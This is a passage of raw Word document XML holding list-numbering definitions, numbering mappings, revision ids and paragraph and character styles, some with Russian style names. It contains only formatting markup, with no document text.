    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8645" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000412"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000895"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="382" w:hanging="576"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="382" w:hanging="576"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:spacing w:val="-26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576"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3393" w:hanging="576"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4398" w:hanging="576"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5403" w:hanging="576"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6407" w:hanging="576"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7412" w:hanging="576"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8417" w:hanging="576"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000413"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000896"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="382" w:hanging="427"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="382" w:hanging="42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7"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3393" w:hanging="427"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4398" w:hanging="427"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5403" w:hanging="427"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6407" w:hanging="427"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7412" w:hanging="427"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8417" w:hanging="427"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000414"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000897"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="382" w:hanging="449"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="382" w:hanging="449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9"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3393" w:hanging="449"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4398" w:hanging="449"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5403" w:hanging="449"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6407" w:hanging="449"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7412" w:hanging="449"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8417" w:hanging="449"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000415"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000898"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="6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37"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3393" w:hanging="437"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4398" w:hanging="437"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5403" w:hanging="437"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6407" w:hanging="437"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7412" w:hanging="437"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8417" w:hanging="437"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000416"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000899"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="382" w:hanging="447"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="382" w:hanging="44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7"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3393" w:hanging="447"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4398" w:hanging="447"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5403" w:hanging="447"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6407" w:hanging="447"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7412" w:hanging="447"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8417" w:hanging="447"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000417"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0000089A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="8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615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3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3393" w:hanging="615"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4398" w:hanging="615"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5403" w:hanging="615"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6407" w:hanging="615"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7412" w:hanging="615"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8417" w:hanging="615"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000418"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0000089B"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="382" w:hanging="161"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i/>
        <w:iCs/>
        <w:w w:val="100"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1384" w:hanging="161"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2389" w:hanging="161"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3393" w:hanging="161"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4398" w:hanging="161"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5403" w:hanging="161"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6407" w:hanging="161"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7412" w:hanging="161"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8417" w:hanging="161"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="39CE444F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2D7A1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90AE4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CE0C2994"/>
    <w:lvl w:ilvl="0" w:tplc="91D4D8C6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:b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CA52786"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8320D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690513"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF2A3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0168FC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94420EBE"/>
    <w:lvl w:ilvl="0" w:tplc="430CB2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EA9359F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3954DCC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08046B6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F1EA24DC"/>
    <w:lvl w:ilvl="0" w:tplc="04190017">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1)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669A7393"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="24A65B8C"/>
    <w:lvl w:ilvl="0" w:tplc="9EF48B3C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D231749"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1122C86C"/>
    <w:lvl w:ilvl="0" w:tplc="90406616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B4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F5BA8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6F44B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AAE816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FB753E6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D23AA7C8"/>
    <w:lvl w:ilvl="0" w:tplc="208ACDD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320888">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="374353751">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="172040922">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1524972391">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="837038606">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="596600390">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2006084255">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="704404064">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="2069956543">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1711226358">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1192256489">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="337119991">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1550412789">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="260770869">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="652179324">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="916675729">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="588848930">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1080371019">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="643893468">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="2115200259">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="737365715">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1077095497">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1008017574">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="857475403">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1173766212">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1067656053">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1917087813">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="682048208">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="395054930">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1982685889">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="19269682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550750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9055941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4766781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32368759">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1786190655">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="1600063178">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="1789734986">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="15190070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177"/>
    <w:rsid w:val="0000603C"/>
    <w:rsid w:val="000449D2"/>
    <w:rsid w:val="00066F5B"/>
    <w:rsid w:val="000A3248"/>
    <w:rsid w:val="000C67BA"/>
    <w:rsid w:val="000E0C78"/>
    <w:rsid w:val="000F37DF"/>
    <w:rsid w:val="00101E9C"/>
    <w:rsid w:val="0013493F"/>
    <w:rsid w:val="001464D8"/>
    <w:rsid w:val="001A1ADB"/>
    <w:rsid w:val="001A4406"/>
    <w:rsid w:val="001B089A"/>
    <w:rsid w:val="001C704C"/>
    <w:rsid w:val="001E4BD6"/>
    <w:rsid w:val="0025465D"/>
    <w:rsid w:val="0029622B"/>
    <w:rsid w:val="002B2B07"/>
    <w:rsid w:val="002D090A"/>
    <w:rsid w:val="002D34CB"/>
    <w:rsid w:val="002F3F81"/>
    <w:rsid w:val="003068C1"/>
    <w:rsid w:val="00347584"/>
    <w:rsid w:val="00390400"/>
    <w:rsid w:val="004153A5"/>
    <w:rsid w:val="00422D4F"/>
    <w:rsid w:val="00431006"/>
    <w:rsid w:val="004B26DB"/>
    <w:rsid w:val="004B3B68"/>
    <w:rsid w:val="004C53CD"/>
    <w:rsid w:val="004E57F9"/>
    <w:rsid w:val="004F13D6"/>
    <w:rsid w:val="005436B3"/>
    <w:rsid w:val="00546E86"/>
    <w:rsid w:val="0055128B"/>
    <w:rsid w:val="005743DE"/>
    <w:rsid w:val="005A6CF3"/>
    <w:rsid w:val="005B388F"/>
    <w:rsid w:val="005B61B8"/>
    <w:rsid w:val="005C0774"/>
    <w:rsid w:val="005F7D50"/>
    <w:rsid w:val="006125AE"/>
    <w:rsid w:val="00645116"/>
    <w:rsid w:val="00654FAA"/>
    <w:rsid w:val="006766C3"/>
    <w:rsid w:val="006A5B03"/>
    <w:rsid w:val="006A73F0"/>
    <w:rsid w:val="007228ED"/>
    <w:rsid w:val="007376E2"/>
    <w:rsid w:val="0077373B"/>
    <w:rsid w:val="0078174A"/>
    <w:rsid w:val="007A6A00"/>
    <w:rsid w:val="007E2534"/>
    <w:rsid w:val="00802E69"/>
    <w:rsid w:val="00844A8E"/>
    <w:rsid w:val="008C6E53"/>
    <w:rsid w:val="008D7177"/>
    <w:rsid w:val="008E1095"/>
    <w:rsid w:val="009D1D80"/>
    <w:rsid w:val="009F45B6"/>
    <w:rsid w:val="00A11DD3"/>
    <w:rsid w:val="00A12611"/>
    <w:rsid w:val="00A55949"/>
    <w:rsid w:val="00AA1A99"/>
    <w:rsid w:val="00B652C7"/>
    <w:rsid w:val="00B91908"/>
    <w:rsid w:val="00B930CC"/>
    <w:rsid w:val="00BA3672"/>
    <w:rsid w:val="00BA6A4A"/>
    <w:rsid w:val="00C052C3"/>
    <w:rsid w:val="00C47B82"/>
    <w:rsid w:val="00C6335C"/>
    <w:rsid w:val="00CA6FEF"/>
    <w:rsid w:val="00CA7BBE"/>
    <w:rsid w:val="00CC2987"/>
    <w:rsid w:val="00CF76E2"/>
    <w:rsid w:val="00D10112"/>
    <w:rsid w:val="00D10AF1"/>
    <w:rsid w:val="00D13159"/>
    <w:rsid w:val="00D56140"/>
    <w:rsid w:val="00D769A9"/>
    <w:rsid w:val="00D934DD"/>
    <w:rsid w:val="00DF403A"/>
    <w:rsid w:val="00E20C27"/>
    <w:rsid w:val="00E43A90"/>
    <w:rsid w:val="00ED43F7"/>
    <w:rsid w:val="00EE33F0"/>
    <w:rsid w:val="00EE3A0F"/>
    <w:rsid w:val="00EF5B1C"/>
    <w:rsid w:val="00F734C6"/>
    <w:rsid w:val="00FB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22C553"/>
  <w14:defaultImageDpi w14:val="0"/>
  <w15:docId w15:val="{0C498203-C4E0-478F-B18C-E8F02E93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2"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="10">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="11"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="38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pPr>
      <w:ind w:left="38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character" w:customStyle="1" w:styleId="a4">
    <w:name w:val="Основной текст Знак"/>
    <w:link w:val="a3"/>
    <w:uiPriority w:val="1"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="11">
    <w:name w:val="Заголовок 1 Знак"/>
    <w:link w:val="10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a5">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="382" w:firstLine="707"/>
      <w:jc w:val="both"/>
    </w:pPr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7177"/>
    <w:rPr>
      <w:rFonts w:ascii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7177"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aa">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D934DD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934D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934DD"/>
    <w:rPr>
      <w:rFonts w:ascii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934DD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934DD"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="000E0C7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0">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000E0C78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1B089A"/>
    <w:pPr>
      <w:widowControl/>
      <w:numPr>
        <w:numId w:val="30"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1134"/>
        <w:tab w:val="left" w:leader="dot" w:pos="8789"/>
        <w:tab w:val="right" w:pos="9345"/>
      </w:tabs>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:adjustRightInd/>
      <w:spacing w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:noProof/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af1">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="10"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="001B089A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:widowControl/>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:adjustRightInd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1B089A"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af2">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af3"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AA1A99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A1A99"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/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0C67BA"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af5">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af6"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006125AE"/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6125AE"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af7">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006125AE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25465D"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af8">
